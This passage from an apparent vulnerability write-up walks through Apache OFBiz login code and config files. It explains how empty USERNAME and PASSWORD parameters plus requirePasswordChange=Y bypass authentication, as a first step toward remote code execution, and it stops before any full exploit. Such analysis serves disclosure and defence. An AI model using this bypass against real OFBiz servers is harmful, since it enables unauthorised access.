class="o">=</span> <span class="n">checkLogout</span><span class="o">(</span><span class="n">request</span><span class="o">,</span> <span class="n">response</span><span class="o">);</span> <span class="mi">325</span><span class="o">:</span> <span class="c1">// have to reget this because the old session object will be invalid</span> <span class="mi">326</span><span class="o">:</span> <span class="nc">HttpSession</span> <span class="n">session</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="na">getSession</span><span class="o">();</span> <span class="mi">327</span><span class="o">:</span> <span class="mi">328</span><span class="o">:</span> <span class="nc">String</span> <span class="n">username</span> <span class="o">=</span> <span class="kc">null</span><span class="o">;</span> <span class="mi">329</span><span class="o">:</span> <span class="nc">String</span> <span class="n">password</span> <span class="o">=</span> <span class="kc">null</span><span class="o">;</span> <span class="mi">330</span><span class="o">:</span> <span class="nc">String</span> <span class="n">token</span> <span class="o">=</span> <span class="kc">null</span><span class="o">;</span> <span class="mi">331</span><span class="o">:</span> <span class="mi">332</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="n">userLogin</span> <span class="o">==</span> <span class="kc">null</span><span class="o">)</span> <span class="o">{</span> <span class="mi">333</span><span class="o">:</span> <span class="c1">// check parameters</span> <span class="mi">334</span><span class="o">:</span> <span class="n">username</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="na">getParameter</span><span class="o">(</span><span class="s">"USERNAME"</span><span class="o">);</span> <span class="mi">335</span><span class="o">:</span> <span class="n">password</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="na">getParameter</span><span class="o">(</span><span class="s">"PASSWORD"</span><span class="o">);</span> <span class="mi">336</span><span class="o">:</span> <span class="n">token</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="na">getParameter</span><span class="o">(</span><span class="s">"TOKEN"</span><span class="o">);</span> <span class="mi">337</span><span class="o">:</span> <span class="c1">// check session attributes</span> <span class="mi">338</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="n">username</span> <span class="o">==</span> <span class="kc">null</span><span class="o">)</span> <span class="n">username</span> <span class="o">=</span> <span class="o">(</span><span class="nc">String</span><span class="o">)</span> <span class="n">session</span><span class="o">.</span><span class="na">getAttribute</span><span class="o">(</span><span class="s">"USERNAME"</span><span class="o">);</span> <span class="mi">339</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="n">password</span> <span class="o">==</span> <span class="kc">null</span><span class="o">)</span> <span class="n">password</span> <span class="o">=</span> <span class="o">(</span><span class="nc">String</span><span class="o">)</span> <span class="n">session</span><span class="o">.</span><span class="na">getAttribute</span><span class="o">(</span><span class="s">"PASSWORD"</span><span class="o">);</span> <span class="mi">340</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="n">token</span> <span class="o">==</span> <span class="kc">null</span><span class="o">)</span> <span class="n">token</span> <span class="o">=</span> <span class="o">(</span><span class="nc">String</span><span class="o">)</span> <span class="n">session</span><span class="o">.</span><span class="na">getAttribute</span><span class="o">(</span><span class="s">"TOKEN"</span><span class="o">);</span></code></pre></figure> <ol> <li> <p>The <code class="language-plaintext highlighter-rouge">checkLogin()</code> method starts by calling another method <code class="language-plaintext highlighter-rouge">checkLogout()</code> to verify if the user has logged out. The result is stored in a GenericValue object named userLogin.</p> </li> <li> <p>The code then retrieves the HttpSession object which is used to manage session-specific information for the user.</p> </li> <li> <p>Three variables namely <code class="language-plaintext highlighter-rouge">username</code>, <code class="language-plaintext highlighter-rouge">password</code>, and <code class="language-plaintext highlighter-rouge">token</code> are initialized to <code class="language-plaintext highlighter-rouge">null</code>. These variables will be used to store user credentials.</p> </li> <li> <p>If the userLogin is <code class="language-plaintext highlighter-rouge">null</code>, it implies that the user has not logged in. The code proceeds to check request parameters (USERNAME, PASSWORD, and TOKEN) and session attributes for the user’s credentials.</p> </li> </ol> <p>Can we spot a bug in the above code ?</p> <p>What happens if we send a GET request with the parameters namely <code class="language-plaintext highlighter-rouge">username</code>, <code class="language-plaintext highlighter-rouge">password</code> and <code class="language-plaintext highlighter-rouge">token</code> but without a value? All the parameters gets defined but empty, which means it’s <code class="language-plaintext highlighter-rouge">not null</code> but <code class="language-plaintext highlighter-rouge">empty</code> !</p> <p>Ex: <code class="language-plaintext highlighter-rouge">http://localhost:8443/something?USERNAME&amp;PASSWORD</code></p> <p><strong>File</strong>: <em>ofbiz-framework-release18.12.05/framework/webapp/src/main/java/org/apache/ofbiz/webapp/control/LoginWorker.java</em></p> <figure class="highlight"><pre><code class="language-java" data-lang="java"><span class="mi">342</span><span class="o">:</span> <span class="c1">// in this condition log them in if not already; if not logged in or can't log in, save parameters and return error</span> <span class="mi">343</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="n">username</span> <span class="o">==</span> <span class="kc">null</span> <span class="mi">344</span><span class="o">:</span> <span class="o">||</span> <span class="o">(</span><span class="n">password</span> <span class="o">==</span> <span class="kc">null</span> <span class="o">&amp;&amp;</span> <span class="n">token</span> <span class="o">==</span> <span class="kc">null</span><span class="o">)</span> <span class="mi">345</span><span class="o">:</span> <span class="o">||</span> <span class="s">"error"</span><span class="o">.</span><span class="na">equals</span><span class="o">(</span><span class="n">login</span><span class="o">(</span><span class="n">request</span><span class="o">,</span> <span class="n">response</span><span class="o">)))</span> <span class="o">{</span> <span class="mi">346</span><span class="o">:</span> <span class="mi">347</span><span class="o">:</span> <span class="c1">// make sure this attribute is not in the request; this avoids infinite recursion when a login by less stringent criteria (like not checkout the hasLoggedOut field) passes; this is not a normal circumstance but can happen with custom code or in funny error situations when the userLogin service gets the userLogin object but runs into another problem and fails to return an error</span> <span class="mi">348</span><span class="o">:</span> <span class="n">request</span><span class="o">.</span><span class="na">removeAttribute</span><span class="o">(</span><span class="s">"_LOGIN_PASSED_"</span><span class="o">);</span> <span class="mi">349</span><span class="o">:</span> <span class="mi">350</span><span class="o">:</span> <span class="c1">// keep the previous request name in the session</span> <span class="mi">351</span><span class="o">:</span> <span class="n">session</span><span class="o">.</span><span class="na">setAttribute</span><span class="o">(</span><span class="s">"_PREVIOUS_REQUEST_"</span><span class="o">,</span> <span class="n">request</span><span class="o">.</span><span class="na">getPathInfo</span><span class="o">());</span> <span class="mi">352</span><span class="o">:</span> <span class="mi">353</span><span class="o">:</span> <span class="c1">// NOTE: not using the old _PREVIOUS_PARAMS_ attribute at all because it was a security hole as it was used to put data in the URL (never encrypted) that was originally in a form field that may have been encrypted</span> <span class="mi">354</span><span class="o">:</span> <span class="c1">// keep 2 maps: one for URL parameters and one for form parameters</span> <span class="mi">355</span><span class="o">:</span> <span class="nc">Map</span><span class="o">&lt;</span><span class="nc">String</span><span class="o">,</span> <span class="nc">Object</span><span class="o">&gt;</span> <span class="n">urlParams</span> <span class="o">=</span> <span class="nc">UtilHttp</span><span class="o">.</span><span class="na">getUrlOnlyParameterMap</span><span class="o">(</span><span class="n">request</span><span class="o">);</span> <span class="mi">356</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="nc">UtilValidate</span><span class="o">.</span><span class="na">isNotEmpty</span><span class="o">(</span><span class="n">urlParams</span><span class="o">))</span> <span class="o">{</span> <span class="mi">357</span><span class="o">:</span> <span class="n">session</span><span class="o">.</span><span class="na">setAttribute</span><span class="o">(</span><span class="s">"_PREVIOUS_PARAM_MAP_URL_"</span><span class="o">,</span> <span class="n">urlParams</span><span class="o">);</span> <span class="mi">358</span><span class="o">:</span> <span class="o">}</span> <span class="mi">359</span><span class="o">:</span> <span class="nc">Map</span><span class="o">&lt;</span><span class="nc">String</span><span class="o">,</span> <span class="nc">Object</span><span class="o">&gt;</span> <span class="n">formParams</span> <span class="o">=</span> <span class="nc">UtilHttp</span><span class="o">.</span><span class="na">getParameterMap</span><span class="o">(</span><span class="n">request</span><span class="o">,</span> <span class="n">urlParams</span><span class="o">.</span><span class="na">keySet</span><span class="o">(),</span> <span class="kc">false</span><span class="o">);</span> <span class="mi">360</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="nc">UtilValidate</span><span class="o">.</span><span class="na">isNotEmpty</span><span class="o">(</span><span class="n">formParams</span><span class="o">))</span> <span class="o">{</span> <span class="mi">361</span><span class="o">:</span> <span class="n">session</span><span class="o">.</span><span class="na">setAttribute</span><span class="o">(</span><span class="s">"_PREVIOUS_PARAM_MAP_FORM_"</span><span class="o">,</span> <span class="n">formParams</span><span class="o">);</span> <span class="mi">362</span><span class="o">:</span> <span class="o">}</span> <span class="mi">363</span><span class="o">:</span> <span class="mi">364</span><span class="o">:</span> <span class="c1">//if (Debug.infoOn()) Debug.logInfo("checkLogin: PathInfo=" + request.getPathInfo(), module);</span> <span class="mi">365</span><span class="o">:</span> <span class="mi">366</span><span class="o">:</span> <span class="k">return</span> <span class="s">"error"</span><span class="o">;</span> <span class="mi">367</span><span class="o">:</span> <span class="o">}</span> <span class="mi">368</span><span class="o">:}</span></code></pre></figure> <ol start="5"> <li>If any of the required credentials (username, password, or token) is equal to <code class="language-plaintext highlighter-rouge">null</code> or if the login method returns an <code class="language-plaintext highlighter-rouge">error</code> status, the code performs the following actions: <ol> <li>Removes an attribute (<em>_LOGIN_PASSED_</em>) and sets the <em>_PREVIOUS_REQUEST_</em> attribute in the session, storing the path of the request.</li> <li>Stores URL parameters and form parameters in separate maps (<em>_PREVIOUS_PARAM_MAP_URL_</em> and <em>_PREVIOUS_PARAM_MAP_FORM_</em>) in the session.</li> <li>Returns the string <code class="language-plaintext highlighter-rouge">error</code>.</li> </ol> </li> </ol> <h2 id="exploring-login--bypassing-authentication">Exploring login() &amp; bypassing authentication</h2> <p>One of the things we can conclude from <code class="language-plaintext highlighter-rouge">checkLogin()</code> is, if username, password and token is <code class="language-plaintext highlighter-rouge">not null</code>, then the <code class="language-plaintext highlighter-rouge">login()</code> method returns anything other than <code class="language-plaintext highlighter-rouge">error</code> as the string, and will successfully authenticate with the application. So let’s explore <code class="language-plaintext highlighter-rouge">login()</code> and see if there is a way in which we can force it to return any other string other than <code class="language-plaintext highlighter-rouge">error</code>.</p> <p><strong>File</strong>: <em>ofbiz-framework-release18.12.05/framework/webapp/src/main/java/org/apache/ofbiz/webapp/control/LoginWorker.java</em></p> <figure class="highlight"><pre><code class="language-java" data-lang="java"><span class="mi">391</span><span class="o">:</span> <span class="kd">public</span> <span class="kd">static</span> <span class="nc">String</span> <span class="nf">login</span><span class="o">(</span><span class="nc">HttpServletRequest</span> <span class="n">request</span><span class="o">,</span> <span class="nc">HttpServletResponse</span> <span class="n">response</span><span class="o">)</span> <span class="o">{</span> <span class="mi">392</span><span class="o">:</span> <span class="nc">HttpSession</span> <span class="n">session</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="na">getSession</span><span class="o">();</span> <span class="mi">393</span><span class="o">:</span> <span class="mi">394</span><span class="o">:</span> <span class="c1">// Prevent session fixation by making Tomcat generate a new jsessionId (ultimately put in cookie). </span> <span class="mi">395</span><span class="o">:</span> <span class="k">if</span> <span class="o">(!</span><span class="n">session</span><span class="o">.</span><span class="na">isNew</span><span class="o">())</span> <span class="o">{</span> <span class="c1">// Only do when really signing in. </span> <span class="mi">396</span><span class="o">:</span> <span class="n">request</span><span class="o">.</span><span class="na">changeSessionId</span><span class="o">();</span> <span class="mi">397</span><span class="o">:</span> <span class="o">}</span> <span class="mi">398</span><span class="o">:</span> <span class="mi">399</span><span class="o">:</span> <span class="nc">Delegator</span> <span class="n">delegator</span> <span class="o">=</span> <span class="o">(</span><span class="nc">Delegator</span><span class="o">)</span> <span class="n">request</span><span class="o">.</span><span class="na">getAttribute</span><span class="o">(</span><span class="s">"delegator"</span><span class="o">);</span> <span class="mi">400</span><span class="o">:</span> <span class="nc">String</span> <span class="n">username</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="na">getParameter</span><span class="o">(</span><span class="s">"USERNAME"</span><span class="o">);</span> <span class="mi">401</span><span class="o">:</span> <span class="nc">String</span> <span class="n">password</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="na">getParameter</span><span class="o">(</span><span class="s">"PASSWORD"</span><span class="o">);</span> <span class="mi">402</span><span class="o">:</span> <span class="nc">String</span> <span class="n">token</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="na">getParameter</span><span class="o">(</span><span class="s">"TOKEN"</span><span class="o">);</span> <span class="mi">403</span><span class="o">:</span> <span class="nc">String</span> <span class="n">forgotPwdFlag</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="na">getParameter</span><span class="o">(</span><span class="s">"forgotPwdFlag"</span><span class="o">);</span> <span class="mi">404</span><span class="o">:</span> <span class="mi">405</span><span class="o">:</span> <span class="c1">// password decryption</span> <span class="mi">406</span><span class="o">:</span> <span class="nc">EntityCrypto</span> <span class="n">entityDeCrypto</span> <span class="o">=</span> <span class="kc">null</span><span class="o">;</span> <span class="mi">407</span><span class="o">:</span> <span class="k">try</span> <span class="o">{</span> <span class="mi">408</span><span class="o">:</span> <span class="n">entityDeCrypto</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">EntityCrypto</span><span class="o">(</span><span class="n">delegator</span><span class="o">,</span> <span class="kc">null</span><span class="o">);</span> <span class="mi">409</span><span class="o">:</span> <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">EntityCryptoException</span> <span class="n">e1</span><span class="o">)</span> <span class="o">{</span> <span class="mi">410</span><span class="o">:</span> <span class="nc">Debug</span><span class="o">.</span><span class="na">logError</span><span class="o">(</span><span class="n">e1</span><span class="o">.</span><span class="na">getMessage</span><span class="o">(),</span> <span class="n">module</span><span class="o">);</span> <span class="mi">411</span><span class="o">:</span> <span class="o">}</span> <span class="mi">412</span><span class="o">:</span> <span class="mi">413</span><span class="o">:</span> <span class="k">if</span><span class="o">(</span><span class="n">entityDeCrypto</span> <span class="o">!=</span> <span class="kc">null</span> <span class="o">&amp;&amp;</span> <span class="s">"true"</span><span class="o">.</span><span class="na">equals</span><span class="o">(</span><span class="n">forgotPwdFlag</span><span class="o">))</span> <span class="o">{</span> <span class="mi">414</span><span class="o">:</span> <span class="k">try</span> <span class="o">{</span> <span class="mi">415</span><span class="o">:</span> <span class="nc">Object</span> <span class="n">decryptedPwd</span> <span class="o">=</span> <span class="n">entityDeCrypto</span><span class="o">.</span><span class="na">decrypt</span><span class="o">(</span><span class="n">keyValue</span><span class="o">,</span> <span class="nc">ModelField</span><span class="o">.</span><span class="na">EncryptMethod</span><span class="o">.</span><span class="na">TRUE</span><span class="o">,</span> <span class="n">password</span><span class="o">);</span> <span class="mi">416</span><span class="o">:</span> <span class="n">password</span> <span class="o">=</span> <span class="n">decryptedPwd</span><span class="o">.</span><span class="na">toString</span><span class="o">();</span> <span class="mi">417</span><span class="o">:</span> <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">GeneralException</span> <span class="n">e</span><span class="o">)</span> <span class="o">{</span> <span class="mi">418</span><span class="o">:</span> <span class="nc">Debug</span><span class="o">.</span><span class="na">logError</span><span class="o">(</span><span class="n">e</span><span class="o">,</span> <span class="s">"Current Password Decryption failed"</span><span class="o">,</span> <span class="n">module</span><span class="o">);</span> <span class="mi">419</span><span class="o">:</span> <span class="o">}</span> <span class="mi">420</span><span class="o">:</span> <span class="o">}</span> <span class="mi">421</span><span class="o">:</span> <span class="mi">422</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="n">username</span> <span class="o">==</span> <span class="kc">null</span><span class="o">)</span> <span class="n">username</span> <span class="o">=</span> <span class="o">(</span><span class="nc">String</span><span class="o">)</span> <span class="n">session</span><span class="o">.</span><span class="na">getAttribute</span><span class="o">(</span><span class="s">"USERNAME"</span><span class="o">);</span> <span class="mi">423</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="n">password</span> <span class="o">==</span> <span class="kc">null</span><span class="o">)</span> <span class="n">password</span> <span class="o">=</span> <span class="o">(</span><span class="nc">String</span><span class="o">)</span> <span class="n">session</span><span class="o">.</span><span class="na">getAttribute</span><span class="o">(</span><span class="s">"PASSWORD"</span><span class="o">);</span> <span class="mi">424</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="n">token</span> <span class="o">==</span> <span class="kc">null</span><span class="o">)</span> <span class="n">token</span> <span class="o">=</span> <span class="o">(</span><span class="nc">String</span><span class="o">)</span> <span class="n">session</span><span class="o">.</span><span class="na">getAttribute</span><span class="o">(</span><span class="s">"TOKEN"</span><span class="o">);</span></code></pre></figure> <ol> <li> <p>The method starts with retrieving the delegator, username, password, token, and a flag indicating whether the password is being reset (<code class="language-plaintext highlighter-rouge">forgotPwdFlag</code>) from request parameters.</p> </li> <li> <p>If the <code class="language-plaintext highlighter-rouge">forgotPwdFlag</code> is set to <code class="language-plaintext highlighter-rouge">true</code>, it attempts to decrypt the password using an <code class="language-plaintext highlighter-rouge">EntityCrypto</code> instance. If any of the parameters (username, password, or token) is missing from the request, it attempts to retrieve them from the session attributes.</p> </li> </ol> <figure class="highlight"><pre><code class="language-java" data-lang="java"><span class="mi">426</span><span class="o">:</span> <span class="c1">// allow a username and/or password in a request attribute to override the request parameter or the session attribute; this way a preprocessor can play with these a bit...</span> <span class="mi">427</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="nc">UtilValidate</span><span class="o">.</span><span class="na">isNotEmpty</span><span class="o">(</span><span class="n">request</span><span class="o">.</span><span class="na">getAttribute</span><span class="o">(</span><span class="s">"USERNAME"</span><span class="o">)))</span> <span class="o">{</span> <span class="mi">428</span><span class="o">:</span> <span class="n">username</span> <span class="o">=</span> <span class="o">(</span><span class="nc">String</span><span class="o">)</span> <span class="n">request</span><span class="o">.</span><span class="na">getAttribute</span><span class="o">(</span><span class="s">"USERNAME"</span><span class="o">);</span> <span class="mi">429</span><span class="o">:</span> <span class="o">}</span> <span class="mi">430</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="nc">UtilValidate</span><span class="o">.</span><span class="na">isNotEmpty</span><span class="o">(</span><span class="n">request</span><span class="o">.</span><span class="na">getAttribute</span><span class="o">(</span><span class="s">"PASSWORD"</span><span class="o">)))</span> <span class="o">{</span> <span class="mi">431</span><span class="o">:</span> <span class="n">password</span> <span class="o">=</span> <span class="o">(</span><span class="nc">String</span><span class="o">)</span> <span class="n">request</span><span class="o">.</span><span class="na">getAttribute</span><span class="o">(</span><span class="s">"PASSWORD"</span><span class="o">);</span> <span class="mi">432</span><span class="o">:</span> <span class="o">}</span> <span class="mi">433</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="nc">UtilValidate</span><span class="o">.</span><span class="na">isNotEmpty</span><span class="o">(</span><span class="n">request</span><span class="o">.</span><span class="na">getAttribute</span><span class="o">(</span><span class="s">"TOKEN"</span><span class="o">)))</span> <span class="o">{</span> <span class="mi">434</span><span class="o">:</span> <span class="n">token</span> <span class="o">=</span> <span class="o">(</span><span class="nc">String</span><span class="o">)</span> <span class="n">request</span><span class="o">.</span><span class="na">getAttribute</span><span class="o">(</span><span class="s">"TOKEN"</span><span class="o">);</span> <span class="mi">435</span><span class="o">:</span> <span class="o">}</span> <span class="mi">436</span><span class="o">:</span> <span class="mi">437</span><span class="o">:</span> <span class="nc">List</span><span class="o">&lt;</span><span class="nc">String</span><span class="o">&gt;</span> <span class="n">unpwErrMsgList</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">LinkedList</span><span class="o">&lt;</span><span class="nc">String</span><span class="o">&gt;();</span> <span class="mi">438</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="nc">UtilValidate</span><span class="o">.</span><span class="na">isEmpty</span><span class="o">(</span><span class="n">username</span><span class="o">))</span> <span class="o">{</span> <span class="mi">439</span><span class="o">:</span> <span class="n">unpwErrMsgList</span><span class="o">.</span><span class="na">add</span><span class="o">(</span><span class="nc">UtilProperties</span><span class="o">.</span><span class="na">getMessage</span><span class="o">(</span><span class="n">resourceWebapp</span><span class="o">,</span> <span class="s">"loginevents.username_was_empty_reenter"</span><span class="o">,</span> <span class="nc">UtilHttp</span><span class="o">.</span><span class="na">getLocale</span><span class="o">(</span><span class="n">request</span><span class="o">)));</span> <span class="mi">440</span><span class="o">:</span> <span class="o">}</span> <span class="mi">441</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="nc">UtilValidate</span><span class="o">.</span><span class="na">isEmpty</span><span class="o">(</span><span class="n">password</span><span class="o">)</span> <span class="o">&amp;&amp;</span> <span class="nc">UtilValidate</span><span class="o">.</span><span class="na">isEmpty</span><span class="o">(</span><span class="n">token</span><span class="o">))</span> <span class="o">{</span> <span class="mi">442</span><span class="o">:</span> <span class="n">unpwErrMsgList</span><span class="o">.</span><span class="na">add</span><span class="o">(</span><span class="nc">UtilProperties</span><span class="o">.</span><span class="na">getMessage</span><span class="o">(</span><span class="n">resourceWebapp</span><span class="o">,</span> <span class="s">"loginevents.password_was_empty_reenter"</span><span class="o">,</span> <span class="nc">UtilHttp</span><span class="o">.</span><span class="na">getLocale</span><span class="o">(</span><span class="n">request</span><span class="o">)));</span> <span class="mi">443</span><span class="o">:</span> <span class="o">}</span> <span class="mi">444</span><span class="o">:</span> <span class="kt">boolean</span> <span class="n">requirePasswordChange</span> <span class="o">=</span> <span class="s">"Y"</span><span class="o">.</span><span class="na">equals</span><span class="o">(</span><span class="n">request</span><span class="o">.</span><span class="na">getParameter</span><span class="o">(</span><span class="s">"requirePasswordChange"</span><span class="o">));</span> <span class="mi">445</span><span class="o">:</span> <span class="k">if</span> <span class="o">(!</span><span class="n">unpwErrMsgList</span><span class="o">.</span><span class="na">isEmpty</span><span class="o">())</span> <span class="o">{</span> <span class="mi">446</span><span class="o">:</span> <span class="n">request</span><span class="o">.</span><span class="na">setAttribute</span><span class="o">(</span><span class="s">"_ERROR_MESSAGE_LIST_"</span><span class="o">,</span> <span class="n">unpwErrMsgList</span><span class="o">);</span> <span class="mi">447</span><span class="o">:</span> <span class="k">return</span> <span class="n">requirePasswordChange</span> <span class="o">?</span> <span class="s">"requirePasswordChange"</span> <span class="o">:</span> <span class="s">"error"</span><span class="o">;</span> <span class="mi">448</span><span class="o">:</span> <span class="o">}</span></code></pre></figure> <ol start="3"> <li> <p>The code allows the username, password, and token to be overridden by values set in request attributes.</p> </li> <li> <p>It checks for missing <code class="language-plaintext highlighter-rouge">username</code> or <code class="language-plaintext highlighter-rouge">password</code> or <code class="language-plaintext highlighter-rouge">token</code> and populates an error message list named <code class="language-plaintext highlighter-rouge">unpwErrMsgList</code>. If errors are present, it sets the error messages in the request attribute and returns either <code class="language-plaintext highlighter-rouge">requirePasswordChange</code> or <code class="language-plaintext highlighter-rouge">error</code>, depending on the value of <code class="language-plaintext highlighter-rouge">requirePasswordChange</code> in the request parameters.</p> </li> </ol> <p>This is precisely what we need, if we explicitly set the value of <code class="language-plaintext highlighter-rouge">requirePasswordChange</code> to <code class="language-plaintext highlighter-rouge">Y</code> and set <code class="language-plaintext highlighter-rouge">username</code> as well as <code class="language-plaintext highlighter-rouge">password</code> to be empty, the login() function returns <code class="language-plaintext highlighter-rouge">requirePasswordChange</code> rather than returning <code class="language-plaintext highlighter-rouge">error</code> which leads to the success path of the code !</p> <h2 id="triggering-the-vulnerability">Triggering the Vulnerability:</h2> <p>In order to trigger the vulnerability, we first need to understand the architecture of the application and see how we can trigger the groovyScript after bypassing authentication, essentially getting RCE.</p> <h3 id="architecture">Architecture</h3> <p>From the docs directory, inside the developer manual, we can see an architecture diagram explaining how a request gets routed through OFBiz.</p> <div align="center"><img src="/images/2024/ofbiz-architecture.png" alt="Apache OFBiz Architecture" width="750" /></div> <p>Reading further through the documentation, we can see something interesting:</p> <blockquote> <p>The Java Servlet Container (tomcat) re-routes incoming requests through web.xml to a special OFBiz servlet called the control servlet. The control servlet for each OFBiz component is defined in controller.xml under the webapp folder. The main configuration for routing happens in controller.xml. The purpose of this file is to map request endpoints to responses with flags for security related attributes.</p> </blockquote> <p>So essentially OFBiz uses Apache tomcat as it’s core webserver which re-reoutes incoming requests through the <code class="language-plaintext highlighter-rouge">web.xml</code> to the control servlet. Each component’s control server is defined in <code class="language-plaintext highlighter-rouge">controller.xml</code>, a central configuration file that defines request handlers, which are responsible for processing incoming requests. So, in-order to fully understand how request mapping works, we need to look at 3 xml files, namely <code class="language-plaintext highlighter-rouge">ofbiz-component.xml</code>, <code class="language-plaintext highlighter-rouge">web.xml</code> and <code class="language-plaintext highlighter-rouge">controller.xml</code>. Let’s take an example <code class="language-plaintext highlighter-rouge">/framework/webtools</code> to understand this:</p> <h3 id="ofbiz-componentxml">ofbiz-component.xml</h3> <p>Let’s explore the <code class="language-plaintext highlighter-rouge">ofbiz-component.xml</code> file:</p> <p><strong>File</strong>: <em>ofbiz-framework-release18.12.05/framework/webtools/ofbiz-component.xml</em></p> <figure class="highlight"><pre><code class="language-xml" data-lang="xml">30: <span class="nt">&lt;webapp</span> <span class="na">name=</span><span class="s">"webtools"</span> <span class="err">31:</span> <span class="na">title=</span><span class="s">"WebTools"</span> <span class="err">32:</span> <span class="na">position=</span><span class="s">"12"</span> <span class="err">33:</span> <span class="na">server=</span><span class="s">"default-server"</span> <span class="err">34:</span> <span class="na">location=</span><span class="s">"webapp/webtools"</span> <span class="err">35:</span> <span class="na">base-permission=</span><span class="s">"OFBTOOLS,WEBTOOLS"</span> <span class="err">36:</span> <span class="na">mount-point=</span><span class="s">"/webtools"</span><span class="nt">/&gt;</span></code></pre></figure> <p>So we can conclude that the mount-point to access the framework’s webtools directory is to hit <code class="language-plaintext highlighter-rouge">/webtools</code>.</p> <h3 id="webxml">web.xml</h3> <p>Let’s explore the <code class="language-plaintext highlighter-rouge">web.xml</code> file, specifically the control servlet mapping:</p> <p><strong>File</strong>: <em>ofbiz-framework-release18.12.05/framework/webtools/webapp/webtools/WEB-INF/web.xml</em></p> <figure class="highlight"><pre><code class="language-xml" data-lang="xml">102: <span class="nt">&lt;servlet&gt;</span> 103: <span class="nt">&lt;description&gt;</span>Main Control Servlet<span class="nt">&lt;/description&gt;</span> 104: <span class="nt">&lt;display-name&gt;</span>ControlServlet<span class="nt">&lt;/display-name&gt;</span> 105: <span class="nt">&lt;servlet-name&gt;</span>ControlServlet<span class="nt">&lt;/servlet-name&gt;</span> 106: <span class="nt">&lt;servlet-class&gt;</span>org.apache.ofbiz.webapp.control.ControlServlet<span class="nt">&lt;/servlet-class&gt;</span> 107: <span class="nt">&lt;load-on-startup&gt;</span>1<span class="nt">&lt;/load-on-startup&gt;</span> 108: <span class="nt">&lt;/servlet&gt;</span> 109: <span class="nt">&lt;servlet-mapping&gt;</span> 110: <span class="nt">&lt;servlet-name&gt;</span>ControlServlet<span class="nt">&lt;/servlet-name&gt;</span> 111: <span class="nt">&lt;url-pattern&gt;</span>/control/*<span class="nt">&lt;/url-pattern&gt;</span> 112: <span class="nt">&lt;/servlet-mapping&gt;</span></code></pre></figure> <ul> <li><code class="language-plaintext highlighter-rouge">servlet-name</code> specifies a name for the servlet, in this case, <code class="language-plaintext highlighter-rouge">ControlServlet</code></li> <li><code class="language-plaintext highlighter-rouge">servlet-class</code> specifies the fully qualified class name of the control servlet (<code class="language-plaintext highlighter-rouge">org.apache.ofbiz.webapp.control.ControlServlet</code>).</li> <li><code class="language-plaintext highlighter-rouge">url-pattern</code> defines the URL pattern to which the servlet is mapped. Here, it’s /control/*, meaning that the control servlet will handle requests with URLs starting with <code class="language-plaintext highlighter-rouge">/control/</code>.</li> </ul> <p>So this means the request mapping currently looks like <code class="language-plaintext highlighter-rouge">/webtools/control</code>.</p> <h3 id="controllerxml">controller.xml</h3> <p>Let’s explore the <code class="language-plaintext highlighter-rouge">controller.xml</code> file:</p> <p><strong>File</strong>: <em>ofbiz-framework-release18.12.05/framework/webtools/webapp/webtools/WEB-INF/controller.xml</em></p> <figure class="highlight"><pre><code class="language-xml" data-lang="xml">65: <span class="nt">&lt;request-map</span> <span class="na">uri=</span><span class="s">"ping"</span><span class="nt">&gt;</span> 66: <span class="nt">&lt;security</span> <span class="na">auth=</span><span class="s">"true"</span><span class="nt">/&gt;</span> 67: <span class="nt">&lt;event</span> <span class="na">type=</span><span class="s">"service"</span> <span class="na">invoke=</span><span class="s">"ping"</span><span class="nt">/&gt;</span> 68: <span class="nt">&lt;response</span> <span class="na">name=</span><span class="s">"error"</span> <span class="na">type=</span><span class="s">"view"</span> <span class="na">value=</span><span class="s">"ping"</span><span class="nt">/&gt;</span> 69: <span class="nt">&lt;response</span> <span class="na">name=</span><span class="s">"success"</span> <span class="na">type=</span><span class="s">"view"</span> <span class="na">value=</span><span class="s">"ping"</span><span class="nt">/&gt;</span> 70: <span class="nt">&lt;/request-map&gt;</span> . . 419: <span class="nt">&lt;request-map</span> <span class="na">uri=</span><span class="s">"ProgramExport"</span><span class="nt">&gt;</span> 420: <span class="nt">&lt;security</span> <span class="na">https=</span><span class="s">"true"</span> <span class="na">auth=</span><span class="s">"true"</span><span class="nt">/&gt;</span> 421: <span class="nt">&lt;response</span> <span class="na">name=</span><span class="s">"success"</span> <span class="na">type=</span><span class="s">"view"</span> <span class="na">value=</span><span class="s">"ProgramExport"</span><span class="nt">/&gt;</span> 422: <span class="nt">&lt;response</span> <span class="na">name=</span><span class="s">"error"</span> <span class="na">type=</span><span class="s">"view"</span> <span class="na">value=</span><span class="s">"ProgramExport"</span><span class="nt">/&gt;</span> 423: <span class="nt">&lt;/request-map&gt;</span></code></pre></figure> <p>From the above file,</p> <ul> <li>The <code class="language-plaintext highlighter-rouge">request-map</code> elements define mappings for specific URIs namely <code class="language-plaintext highlighter-rouge">ping</code> in this case.</li> <li>The <code class="language-plaintext highlighter-rouge">security</code> element specifies security-related attributes. <code class="language-plaintext highlighter-rouge">auth=true</code> means authentication is 